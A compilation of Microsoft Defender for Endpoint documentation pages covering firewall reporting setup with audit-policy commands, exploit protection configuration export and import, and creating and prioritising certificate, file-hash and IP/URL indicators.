-description: Host and view firewall reporting in Microsoft Defender portal.
- Previously updated : 04/11/2024-------- m365-security-- tier2-- mde-asr---
-# Host firewall reporting in Microsoft Defender for Endpoint
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-If you're a Global or security administrator, you can now host firewall reporting to the [Microsoft Defender portal](https://security.microsoft.com). This feature enables you to view Windows firewall reporting from a centralized location.
-
-## What do you need to know before you begin?
--- Your devices must be running Windows 10 or later, or Windows Server 2012 R2 or later. For Windows Server 2012 R2 and Windows Server 2016 to appear in firewall reports, these devices must be onboarded using the modern unified solution package. For more information, see [New functionality in the modern unified solution for Windows Server 2012 R2 and 2016](/microsoft-365/security/defender-endpoint/configure-server-endpoints#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution).--- To onboard devices to the Microsoft Defender for Endpoint service, see [onboarding guidance](onboard-configure.md).--- For the [Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2077139) to start receiving data, you must enable **Audit Events** for Windows Defender Firewall with Advanced Security. See the following articles:-
- - [Audit Filtering Platform Packet Drop](/windows/security/threat-protection/auditing/audit-filtering-platform-packet-drop)
- - [Audit Filtering Platform Connection](/windows/security/threat-protection/auditing/audit-filtering-platform-connection)
--- Enable these events by using Group Policy Object Editor, Local Security Policy, or the auditpol.exe commands. For more information, see [documentation about auditing and logging](/windows/win32/fwp/auditing-and-logging). The two PowerShell commands are as follows:-
- - `auditpol /set /subcategory:"Filtering Platform Packet Drop" /failure:enable`
- - `auditpol /set /subcategory:"Filtering Platform Connection" /failure:enable`
-
- Here's an example query:
-
- ```powershell
- param (
- [switch]$remediate
- )
- try {
-
- $categories = "Filtering Platform Packet Drop,Filtering Platform Connection"
- $current = auditpol /get /subcategory:"$($categories)" /r | ConvertFrom-Csv
- if ($current."Inclusion Setting" -ne "failure") {
- if ($remediate.IsPresent) {
- Write-Host "Remediating. No Auditing Enabled. $($current | ForEach-Object {$_.Subcategory + ":" + $_.'Inclusion Setting' + ";"})"
- $output = auditpol /set /subcategory:"$($categories)" /failure:enable
- if($output -eq "The command was successfully executed.") {
- Write-Host "$($output)"
- exit 0
- }
- else {
- Write-Host "$($output)"
- exit 1
- }
- }
- else {
- Write-Host "Remediation Needed. $($current | ForEach-Object {$_.Subcategory + ":" + $_.'Inclusion Setting' + ";"})."
- exit 1
- }
- }
-
- }
- catch {
- throw $_
- }
- ```
-
-## The process
-
-> [!NOTE]
-> Make sure to follow the instructions from previous the section and properly configure your devices to participate in the preview program.
--- After events are enabled, Microsoft Defender for Endpoint begins to monitor data, which includes:
- - Remote IP
- - Remote Port
- - Local Port
- - Local IP
- - Computer Name
- - Process across inbound and outbound connections
--- Admins can now see Windows host firewall activity [here](https://security.microsoft.com/firewall). Additional reporting can be facilitated by downloading the [Custom Reporting script](https://github.com/microsoft/MDATP-PowerBI-Templates/tree/master/Firewall) to monitor the Windows Defender Firewall activities using Power BI.-
- - It can take up to 12 hours before the data is reflected.
-
-## Supported scenarios
--- [Firewall reporting](#firewall-reporting)-- [From "Computers with a blocked connection" to device](#from-computers-with-a-blocked-connection-to-device) (requires Defender for Endpoint Plan 2)-- [Drill into advanced hunting (preview refresh)](#drill-into-advanced-hunting-preview-refresh) (requires Defender for Endpoint Plan 2)-
-### Firewall reporting
-
-Here are some examples of the firewall report pages. Here you'll find a summary of inbound, outbound, and application activity. You can access this page directly by going to <https://security.microsoft.com/firewall>.
--
-These reports can also be accessed by going to **Reports** > **Security Report** > **Devices** (section) located at the bottom of the **Firewall Blocked Inbound Connections** card.
-
-### From "Computers with a blocked connection" to device
-
-> [!NOTE]
-> This feature requires Defender for Endpoint Plan 2.
-
-Cards support interactive objects. You can drill into the activity of a device by clicking on the device name, which will launch the Microsoft Defender portal in a new tab, and take you directly to the **Device Timeline** tab.
--
-You can now select the **Timeline** tab, which will give you a list of events associated with that device.
-
-After clicking on the **Filters** button on the upper right-hand corner of the viewing pane, select the type of event you want. In this case, select **Firewall events** and the pane will be filtered to Firewall events.
--
-### Drill into advanced hunting (preview refresh)
-
-> [!NOTE]
-> This feature requires Defender for Endpoint Plan 2.
-
-Firewall reports support drilling from the card directly into **Advanced Hunting** by clicking the **Open Advanced hunting** button. The query is prepopulated.
--
-The query can now be executed, and all related Firewall events from the last 30 days can be explored.
-
-For more reporting, or custom changes, the query can be exported into Power BI for further analysis. Custom reporting can be facilitated by downloading the [Custom Reporting script](https://github.com/microsoft/MDATP-PowerBI-Templates/tree/master/Firewall) to monitor the Windows Defender Firewall activities using Power BI.
-
security Import Export Exploit Protection Emet Xml https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/import-export-exploit-protection-emet-xml.md
- Title: Import, export, and deploy exploit protection configurations
-description: Use Group Policy to deploy mitigations configuration.
---------- m365-security-- tier2-- asr Previously updated : 06/29/2023--
-# Import, export, and deploy exploit protection configurations
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Exploit protection helps protect devices from malware that use exploits to spread and infect. It consists of a number of mitigations that can be applied at either the operating system level, or at the individual app level.
-
-You use the Windows Security app or PowerShell to create a set of mitigations (known as a configuration). You can then export this configuration as an XML file and share it with multiple devices on your network. Then, they all have the same set of mitigation settings.
-
-## Create and export a configuration file
-
-Before you export a configuration file, you need to ensure you have the correct settings. First, configure exploit protection on a single, dedicated device. See [Customize exploit protection](customize-exploit-protection.md) for more information about configuring mitigations.
-
-When you've configured exploit protection to your desired state (including both system-level and app-level mitigations), you can export the file using either the Windows Security app or PowerShell.
-
-### Use the Windows Security app to export a configuration file
-
-1. Open the Windows Security app by selecting the shield icon in the task bar. Or, search the start menu for **Windows Security**.
-
-2. Select the **App & browser control** tile (or the app icon on the left menu bar) and then select **Exploit protection settings**:
-
- :::image type="content" source="../../media/wdsc-exp-prot.png" alt-text="The Exploit protection settings option in the Windows Security app" lightbox="../../media/wdsc-exp-prot.png":::
-
-3. At the bottom of the **Exploit protection** section, select **Export settings**. Choose the location and name of the XML file where you want the configuration to be saved.
-
- > [!IMPORTANT]
- > If you want to use Default configuration, use the settings "On by default" instead of "Use Default (On)" to get the settings exported correctly on the XML file.
-
- :::image type="content" source="../../media/wdsc-exp-prot-export.png" alt-text="The Export Settings option" lightbox="../../media/wdsc-exp-prot-export.png":::
-
- > [!NOTE]
- > When you export the settings, all settings for both app-level and system-level mitigations are saved. This means you don't need to export a file from both the **System settings** and **Program settings** sections (either section will export all settings).
-
-### Use PowerShell to export a configuration file
-
-1. Type **powershell** in the Start menu, right-click **Windows PowerShell** and select **Run as administrator**.
-2. Enter the following cmdlet:
-
- ```PowerShell
- Get-ProcessMitigation -RegistryConfigFilePath filename.xml
- ```
-
- Change `filename` to any name or location of your choosing.
-
- Example command:
-
- ```powershell
- Get-ProcessMitigation -RegistryConfigFilePath C:\ExploitConfigfile.xml
- ```
-
-> [!IMPORTANT]
-> When you deploy the configuration using Group Policy, all devices that will use the configuration must be able to access the configuration file. Ensure you place the file in a shared location.
-
-## Import a configuration file
-
-You can import an exploit protection configuration file that you've previously created. You can only use PowerShell to import the configuration file.
-
-After importing, the settings will be instantly applied and can be reviewed in the Windows Security app.
-
-### Use PowerShell to import a configuration file
-
-1. Type **powershell** in the Start menu, right-click **Windows PowerShell** and select **Run as administrator**.
-2. Enter the following cmdlet:
-
- ```PowerShell
- Set-ProcessMitigation -PolicyFilePath filename.xml
- ```
-
- Change `filename` to the location and name of the exploit protection XML file.
-
- Example command:
-
- ```powershell
- Set-ProcessMitigation -PolicyFilePath C:\ExploitConfigfile.xml
- ```
-
-> [!IMPORTANT]
-> Ensure you import a configuration file that is created specifically for exploit protection.
-
-## Manage or deploy a configuration
-
-You can use Group Policy to deploy the configuration you've created to multiple devices in your network.
-
-> [!IMPORTANT]
-> When you deploy the configuration using Group Policy, all devices that will use the configuration must be able to access the configuration XML file. Ensure you place the file in a shared location.
-
-### Use Group Policy to distribute the configuration
-
-1. On your Group Policy management device, open the [Group Policy Management Console](/previous-versions/windows/desktop/gpmc/group-policy-management-console-portal), right-click the Group Policy Object you want to configure and **Edit**.
-
-2. In the **Group Policy Management Editor**, go to **Computer configuration** and select **Administrative templates**.
-
-3. Expand the tree to **Windows components** \> **Microsoft Defender Exploit Guard** \> **Exploit protection**.
-
- :::image type="content" source="../../media/exp-prot-gp.png" alt-text="The group policy setting for exploit protection" lightbox="../../media/exp-prot-gp.png":::
-
-4. Double-click **Use a common set of Exploit protection settings** and set the option to **Enabled**.
-
-5. In the **Options:** section, enter the location and file name of the Exploit protection configuration file that you want to use, such as in the following examples:
-
- - `C:\MitigationSettings\Config.XML`
- - `\\Server\Share\Config.xml`
- - `https://localhost:8080/Config.xml`
- - `C:\ExploitConfigfile.xml`
-
-6. Select **OK** and [Deploy the updated GPO as you normally do](/windows/win32/srvnodes/group-policy).
-
-## See also
--- [Protect devices from exploits](exploit-protection.md)-- [Evaluate exploit protection](evaluate-exploit-protection.md)-- [Enable exploit protection](enable-exploit-protection.md)-- [Configure and audit exploit protection mitigations](customize-exploit-protection.md)
security Indicator Certificates https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/indicator-certificates.md
- Title: Create indicators based on certificates-
-description: Create indicators based on certificates that define the detection, prevention, and exclusion of entities.
------- m365-security-- tier2-- mde-asr-- Previously updated : 12/18/2020--
-# Create indicators based on certificates
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/WindowsForBusiness/windows-atp?ocid=docs-wdatp-automationexclusionlist-abovefoldlink)
-
-You can create indicators for certificates. Some common use cases include:
--- Scenarios when you need to deploy blocking technologies, such as [attack surface reduction rules](attack-surface-reduction.md) and [controlled folder access](controlled-folders.md) but need to allow behaviors from signed applications by adding the certificate in the allow list.-- Blocking the use of a specific signed application across your organization. By creating an indicator to block the certificate of the application, Windows Defender AV will prevent file executions (block and remediate) and the Automated Investigation and Remediation behave the same.-
-## Before you begin
-
-It's important to understand the following requirements prior to creating indicators for certificates:
--- This feature is available if your organization uses Microsoft Defender Antivirus and Cloud-based protection is enabled. For more information, see [Manage cloud-based protection](/windows/security/threat-protection/microsoft-defender-antivirus/deploy-manage-report-microsoft-defender-antivirus).-- The Antimalware client version must be 4.18.1901.x or later.-- Supported on machines on Windows 10, version 1703 or later, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, and Windows Server 2022.-
- > [!NOTE]
- > Windows Server 2016 and Windows Server 2012 R2 will need to be onboarded using the instructions in [Onboard Windows servers](configure-server-endpoints.md#windows-server-2012-r2-and-windows-server-2016) for this feature to work.
--- The virus and threat protection definitions must be up to date.-- This feature currently supports entering .CER or .PEM file extensions.-
-> [!IMPORTANT]
->
-> - A valid leaf certificate is a signing certificate that has a valid certification path and must be chained to the Root Certificate Authority (CA) trusted by Microsoft. Alternatively, a custom (self-signed) certificate can be used as long as it's trusted by the client (Root CA certificate is installed under the Local Machine 'Trusted Root Certification Authorities').
-> - The children or parent of the allow/block certificate IOCs are not included in the allow/block IoC functionality, only leaf certificates are supported.
-> - Microsoft signed certificates cannot be blocked.
-
-## Create an indicator for certificates from the settings page:
-
-> [!IMPORTANT]
-> It can take up to 3 hours to create and remove a certificate IoC.
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Indicators** (under **Rules**).
-
-2. Select **Add indicator**.
-
-3. Specify the following details:
- - Indicator - Specify the entity details and define the expiration of the indicator.
- - Action - Specify the action to be taken and provide a description.
- - Scope - Define the scope of the machine group.
-
-4. Review the details in the Summary tab, then click **Save**.
-
-## Related articles
--- [Create indicators](manage-indicators.md)-- [Create indicators for files](indicator-file.md)-- [Create indicators for IPs and URLs/domains](indicator-ip-domain.md)-- [Manage indicators](indicator-manage.md)-- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Indicator File https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/indicator-file.md
- Title: Create indicators for files-
-description: Create indicators for a file hash that define the detection, prevention, and exclusion of entities.
--- Previously updated : 03/20/2024---- m365-security-- tier2-- mde-asr----
-# Create indicators for files
--
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 1](/microsoft-365/security/defender-endpoint/defender-endpoint-plan-1)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
-> [!TIP]
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/WindowsForBusiness/windows-atp?ocid=docs-wdatp-automationexclusionlist-abovefoldlink)
-
-Prevent further propagation of an attack in your organization by banning potentially malicious files or suspected malware. If you know a potentially malicious portable executable (PE) file, you can block it. This operation will prevent it from being read, written, or executed on devices in your organization.
-
-There are three ways you can create indicators for files:
--- By creating an indicator through the settings page-- By creating a contextual indicator using the add indicator button from the file details page-- By creating an indicator through the [Indicator API](ti-indicator.md)-
-> [!NOTE]
-> For this feature to work on Windows Server 2016 and Windows Server 2012 R2, those devices must be onboarded using the instructions in [Onboard Windows servers](configure-server-endpoints.md#windows-server-2012-r2-and-windows-server-2016).
-> Custom file indicators with the Allow, Block and Remediate actions are now also available in the [enhanced antimalware engine capabilities for macOS and Linux](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/enhanced-antimalware-engine-capabilities-for-linux-and-macos/ba-p/3292003).
-
-## Before you begin
-
-Understand the following prerequisites before you create indicators for files:
--- This feature is available if your organization uses [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md) (in active mode) -- [Behavior Monitoring is enabled](/microsoft-365/security/defender-endpoint/behavior-monitor)--- [Cloud-based protection is turned on](/windows/security/threat-protection/microsoft-defender-antivirus/deploy-manage-report-microsoft-defender-antivirus).--- [Cloud Protection network connectivity is functional](/microsoft-365/security/defender-endpoint/configure-network-connections-microsoft-defender-antivirus)--- The Antimalware client version must be `4.18.1901.x` or later. See [Monthly platform and engine versions](microsoft-defender-antivirus-updates.md#monthly-platform-and-engine-versions)--- This feature is supported on devices running Windows 10, version 1703 or later, Windows 11, Windows Server 2012 R2, Windows Server 2016 or later, Windows Server 2019, or Windows Server 2022.--- In `Computer Configuration\Administrative Templates\Windows Components\Microsoft Defender Antivirus\MpEngine\`, the file hash computation feature should be set to **Enabled**
-
-- To start blocking files, [turn on the "block or allow" feature](advanced-features.md) in Settings (in the [Microsoft Defender portal](https://security.microsoft.com), go to **Settings** > **Endpoints** > **General** > **Advanced features** > **Allow or block file**).-
-This feature is designed to prevent suspected malware (or potentially malicious files) from being downloaded from the web. It currently supports portable executable (PE) files, including `.exe` and `.dll` files. Coverage is extended over time.
-
-> [!IMPORTANT]
-> In Defender for Endpoint Plan 1 and Defender for Business, you can create an indicator to block or allow a file. In Defender for Business, your indicator is applied across your environment and cannot be scoped to specific devices.
-
-## Create an indicator for files from the settings page
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Indicators** (under **Rules**).
-
-2. Select the **File hashes** tab.
-
-3. Select **Add item**.
-
-4. Specify the following details:
-
- - Indicator: Specify the entity details and define the expiration of the indicator.
- - Action: Specify the action to be taken and provide a description.
- - Scope: Define the scope of the device group (scoping isn't available in [Defender for Business](../defender-business/mdb-overview.md)).
-
- > [!NOTE]
- > Device Group creation is supported in both Defender for Endpoint Plan 1 and Plan 2
-
-5. Review the details in the Summary tab, then select **Save**.
-
-## Create a contextual indicator from the file details page
-
-One of the options when taking [response actions on a file](respond-file-alerts.md) is adding an indicator for the file. When you add an indicator hash for a file, you can choose to raise an alert and block the file whenever a device in your organization attempts to run it.
-
-Files automatically blocked by an indicator won't show up in the file's Action center, but the alerts will still be visible in the Alerts queue.
-
-## Alerting on file blocking actions (preview)
-
-> [!IMPORTANT]
-> Information in this section (**Public Preview for Automated investigation and remediation engine**) relates to prerelease product which might be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-The current supported actions for file IOC are allow, audit and block, and remediate. After choosing to block a file, you can choose whether triggering an alert is needed. In this way, you'll be able to control the number of alerts getting to your security operations teams and make sure only required alerts are raised.
-
-In Microsoft Defender XDR, go to **Settings** > **Endpoints** > **Indicators** > **Add New File Hash**.
-
-Choose to Block and remediate the file.
-
-Choose if to Generate an alert on the file block event and define the alerts settings:
--- The alert title-- The alert severity-- Category-- Description-- Recommended actions--
-> [!IMPORTANT]
->
-> - Typically, file blocks are enforced and removed within a couple of minutes, but can take upwards of 30 minutes.
-> - If there are conflicting file IoC policies with the same enforcement type and target, the policy of the more secure hash will be applied. An SHA-256 file hash IoC policy will win over an SHA-1 file hash IoC policy, which will win over an MD5 file hash IoC policy if the hash types define the same file. This is always true regardless of the device group.
-> - In all other cases, if conflicting file IoC policies with the same enforcement target are applied to all devices and to the device's group, then for a device, the policy in the device group will win.
-> - If the EnableFileHashComputation group policy is disabled, the blocking accuracy of the file IoC is reduced. However, enabling `EnableFileHashComputation` may impact device performance. For example, copying large files from a network share onto your local device, especially over a VPN connection, might have an effect on device performance.
->
-> For more information about the EnableFileHashComputation group policy, see [Defender CSP](/windows/client-management/mdm/defender-csp).
->
-> For more information on configuring this feature on Defender for Endpoint on Linux and macOS, see [Configure file hash computation feature on Linux](linux-preferences.md#configure-file-hash-computation-feature) and [Configure file hash computation feature on macOS](mac-preferences.md#configure-file-hash-computation-feature).
-
-## Advanced hunting capabilities (preview)
-
-> [!IMPORTANT]
-> Information in this section (**Public Preview for Automated investigation and remediation engine**) relates to prerelease product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-Currently in preview, you can query the response action activity in advance hunting. Below is a sample advance hunting query:
-
-```console
-search in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents, DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents, DeviceLogonEvents)
-Timestamp > ago(30d)
-| where AdditionalFields contains "EUS:Win32/CustomEnterpriseBlock!cl"
-```
-
-For more information about advanced hunting, see [Proactively hunt for threats with advanced hunting](advanced-hunting-overview.md).
-
-Below are other thread names that can be used in the sample query from above:
-
-Files:
--- `EUS:Win32/CustomEnterpriseBlock!cl`-- `EUS:Win32/CustomEnterpriseNoAlertBlock!cl`-
-Certificates:
--- `EUS:Win32/CustomCertEnterpriseBlock!cl`-
-The response action activity can also be viewable in the device timeline.
-
-## Policy conflict handling
-
-Cert and File IoC policy handling conflicts follow this order:
-
-1. If the file isn't allowed by Windows Defender Application Control and AppLocker enforce mode policies, then **Block**.
-2. Else, if the file is allowed by the Microsoft Defender Antivirus exclusions, then **Allow**.
-3. Else, if the file is blocked or warned by a block or warn file IoCs, then **Block/Warn**.
-4. Else, if the file is blocked by SmartScreen, then **Block**.
-5. Else, if the file is allowed by an allow file IoC policy, then **Allow**.
-6. Else, if the file is blocked by attack surface reduction rules, controlled folder access, or antivirus protection, then **Block**.
-7. Else, **Allow** (passes Windows Defender Application Control & AppLocker policy, no IoC rules apply to it).
-
-> [!NOTE]
-> In situations when Microsoft Defender Antivirus is set to **Block**, but Defender for Endpoint indicators for file hash or certificates are set to **Allow**, the policy defaults to **Allow**.
-
-If there are conflicting file IoC policies with the same enforcement type and target, the policy of the more secure (meaning longer) hash is applied. For example, an SHA-256 file hash IoC policy takes precedence over an MD5 file hash IoC policy if both hash types define the same file.
-
-> [!WARNING]
-> Policy conflict handling for files and certs differ from policy conflict handling for domains/URLs/IP addresses.
-
-Microsoft Defender Vulnerability Management's block vulnerable application features uses the file IoCs for enforcement and follows the conflict handling order described earlier in this section.
-
-### Examples
-
-|Component|Component enforcement|File indicator Action|Result|
-|||||
-|Attack surface reduction file path exclusion|Allow|Block|Block|
-|Attack surface reduction rule|Block|Allow|Allow|
-|Windows Defender Application Control|Allow|Block|Allow|
-|Windows Defender Application Control|Block|Allow|Block|
-|Microsoft Defender Antivirus exclusion|Allow|Block|Allow|
-|
-
-## See also
--- [Create indicators](manage-indicators.md)-- [Create indicators for IPs and URLs/domains](indicator-ip-domain.md)-- [Create indicators based on certificates](indicator-certificates.md)-- [Manage indicators](indicator-manage.md)--- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-
security Indicator Ip Domain https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/indicator-ip-domain.md
- Title: Create indicators for IPs and URLs/domains-
-description: Create indicators for IPs and URLs/domains that define the detection, prevention, and exclusion of entities.
------- m365-security-- tier2-- -asr-- Previously updated : 10/06/2023--
-# Create indicators for IPs and URLs/domains
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!TIP]
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/WindowsForBusiness/windows-atp?ocid=docs-wdatp-automationexclusionlist-abovefoldlink)
-
-## Overview
-
-By creating indicators for IPs and URLs or domains, you can now allow or block IPs, URLs, or domains based on your own threat intelligence. You can also warn users with a prompt if they open a risky app. The prompt won't stop them from using the app but you can provide a custom message and links to a company page that describes appropriate usage of the app. Users can still bypass the warning and continue to use the app if they need.
-
-To block malicious IPs/URLs (as determined by Microsoft), Defender for Endpoint can use:
--- Windows Defender SmartScreen for Microsoft browsers-- Network Protection for non-Microsoft browsers, or calls made outside of a browser-
-The threat-intelligence data set to block malicious IPs/URLs is managed by Microsoft.
-
-You can block malicious IPs/URLs through the settings page or by machine groups, if you deem certain groups to be more or less at risk than others.
-
-> [!NOTE]
-> Classless Inter-Domain Routing (CIDR) notation for IP addresses is not supported.
-
-## Before you begin
-
-It's important to understand the following prerequisites prior to creating indicators for IPS, URLs, or domains:
-
-### Network Protection requirements
-
-URL/IP allow and block requires that the Microsoft Defender for Endpoint component _Network Protection_ is enabled in block mode. For more information on Network Protection and configuration instructions, see [Enable network protection](enable-network-protection.md).
-
-### Supported operating systems
--- Windows 10, version 1709 or later-- Windows 11-- Windows Server 2016-- Windows Server 2012 R2-- Windows Server 2019-- Windows Server 2022-- macOS-- Linux-- iOS -- Android-
-### Windows Server 2016 and Windows Server 2012 R2 requirements
-
-Windows Server 2016 and Windows Server 2012 R2 must be onboarded using the instructions in [Onboard Windows servers](configure-server-endpoints.md#windows-server-2012-r2-and-windows-server-2016).
-
-### Microsoft Defender Antivirus version requirements
-
-The _Antimalware client version_ must be 4.18.1906.x or later.
-
-### Custom network indicators requirements
-
-Ensure that **Custom network indicators** is enabled in **Microsoft Defender XDR** \> **Settings** \> **Advanced features**. For more information, see [Advanced features](advanced-features.md).
-
-For support of indicators on iOS, see [Microsoft Defender for Endpoint on iOS](/microsoft-365/security/defender-endpoint/ios-configure-features#configure-custom-indicators).
-
-For support of indicators on Android, see [Microsoft Defender for Endpoint on Android](/microsoft-365/security/defender-endpoint/android-configure#configure-custom-indicators).
-
-### IoC indicator list limitations
-
-Only external IPs can be added to the indicator list. Indicators can't be created for internal IPs. For web protection scenarios, we recommend using the built-in capabilities in Microsoft Edge. Microsoft Edge leverages [Network Protection](network-protection.md) to inspect network traffic and allows blocks for TCP, HTTP, and HTTPS (TLS).
-
-### Non Microsoft Edge and Internet Explorer processes
-
-For processes other than Microsoft Edge and Internet Explorer, web protection scenarios leverage Network Protection for inspection and enforcement:
--- IP is supported for all three protocols (TCP, HTTP, and HTTPS (TLS))-- Only single IP addresses are supported (no CIDR blocks or IP ranges) in custom indicators-- Encrypted URLs (full path) can only be blocked on first party browsers (Internet Explorer, Edge)-- Encrypted URLs (FQDN only) can be blocked in third party browsers (that is, other than Internet Explorer, Edge)-- Full URL path blocks can be applied for unencrypted URLs-- If there are conflicting URL indicator policies, the longer path is applied. For example, the URL indicator policy `https://support.microsoft.com/office` takes precedence over the URL indicator policy `https://support.microsoft.com`.-
-## Network protection and the TCP three-way handshake
-
-With network protection, the determination of whether to allow or block access to a site is made after the completion of the [three-way handshake via TCP/IP](/troubleshoot/windows-server/networking/three-way-handshake-via-tcpip). Thus, when a site is blocked by network protection, you might see an action type of `ConnectionSuccess` under `NetworkConnectionEvents` in the Microsoft Defender portal, even though the site was blocked. `NetworkConnectionEvents` are reported from the TCP layer, and not from network protection. After the three-way handshake has completed, access to the site is allowed or blocked by network protection.
-
-Here's an example of how that works:
-
-1. Suppose that a user attempts to access a website on their device. The site happens to be hosted on a dangerous domain, and it should be blocked by network protection.
-
-2. The three-way handshake via TCP/IP commences. Before it completes, a `NetworkConnectionEvents` action is logged, and its `ActionType` is listed as `ConnectionSuccess`. However, as soon as the three-way handshake process completes, network protection blocks access to the site. All of this happens quickly. A similar process occurs with [Microsoft Defender SmartScreen](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview); it's when the three-way handshake completes that a determination is made, and access to a site is either blocked or allowed.
-
-3. In the Microsoft Defender portal, an alert is listed in the [alerts queue](alerts-queue.md). Details of that alert include both `NetworkConnectionEvents` and `AlertEvents`. You can see that the site was blocked, even though you also have a `NetworkConnectionEvents` item with the ActionType of `ConnectionSuccess`.
-
-### Warn mode controls
-
-When using warn mode, you can configure the following controls:
--- **Bypass ability**
- - Allow button in Edge
- - Allow button on toast (Non-Microsoft browsers)
- - Bypass duration parameter on the indicator
- - Bypass enforcement across Microsoft and Non-Microsoft browsers
--- **Redirect URL**
- - Redirect URL parameter on the indicator
- - Redirect URL in Edge
- - Redirect URL on toast (Non-Microsoft browsers)
-
-For more information, see [Govern apps discovered by Microsoft Defender for Endpoint](/cloud-app-security/mde-govern).
-
-## IoC IP URL and domain policy conflict handling order
-
-Policy conflict handling for domains/URLs/IP addresses differ from policy conflict handling for certs.
-
-In the case where multiple different action types are set on the same indicator (for example, **block**, **warn**, and **allow**, action types set for Microsoft.com), the order those action types would take effect is:
-
-1. Allow
-2. Warn
-3. Block
-
-_Allow_ overrides _warn_ which overrides _block_: Allow > Warn > Block. Therefore, in the above example, Microsoft.com would be allowed.
-
-### Defender for Cloud Apps Indicators
-
-If your organization has enabled integration between Defender for Endpoint and Defender for Cloud Apps, block indicators will be created in Defender for Endpoint for all unsanctioned cloud applications. If an application is put in monitor mode, warn indicators (bypassable block) will be created for the URLs associated with the application. Allow indicators cannot be created for sanctioned applications at this time. Indicators created by Defender for Cloud Apps follow the same policy conflict handling described in the previous section.
-
-## Policy precedence
-
-Microsoft Defender for Endpoint policy has precedence over Microsoft Defender Antivirus policy. In situations when Defender for Endpoint is set to **Allow**, but Microsoft Defender Antivirus is set to **Block**, the policy will default to **Allow**.
-
-### Precedence for multiple active policies
-
-Applying multiple different web content filtering policies to the same device will result in the more restrictive policy applying for each category. Consider the following scenario:
--- **Policy 1** blocks categories 1 and 2 and audits the rest-- **Policy 2** blocks categories 3 and 4 and audits the rest-
-The result is that categories 1-4 are all blocked. This is illustrated in the following image.
--
-## Create an indicator for IPs, URLs, or domains from the settings page
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Indicators** (under **Rules**).
-
-2. Select the **IP addresses or URLs/Domains** tab.
-
-3. Select **Add item**.
-
-4. Specify the following details:
- - Indicator - Specify the entity details and define the expiration of the indicator.
- - Action - Specify the action to be taken and provide a description.
- - Scope - Define the scope of the machine group.
-
-5. Review the details in the **Summary** tab, then select **Save**.
-
-> [!NOTE]
-> There may be up to 2 hours of latency between the time a policy is created and the URL or IP being blocked on the device.
-
-## Related articles
--- [Create indicators](manage-indicators.md)-- [Create indicators for files](indicator-file.md)-- [Create indicators based on certificates](indicator-certificates.md)-- [Manage indicators](indicator-manage.md)-- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-
security Indicator Manage https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/indicator-manage.md
- Title: Manage indicators-
-description: Manage indicators for a file hash, IP address, URLs, or domains that define the detection, prevention, and exclusion of entities.
------- m365-security-- tier2-- mde-asr-- Previously updated : 12/18/2020--
-# Manage indicators
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
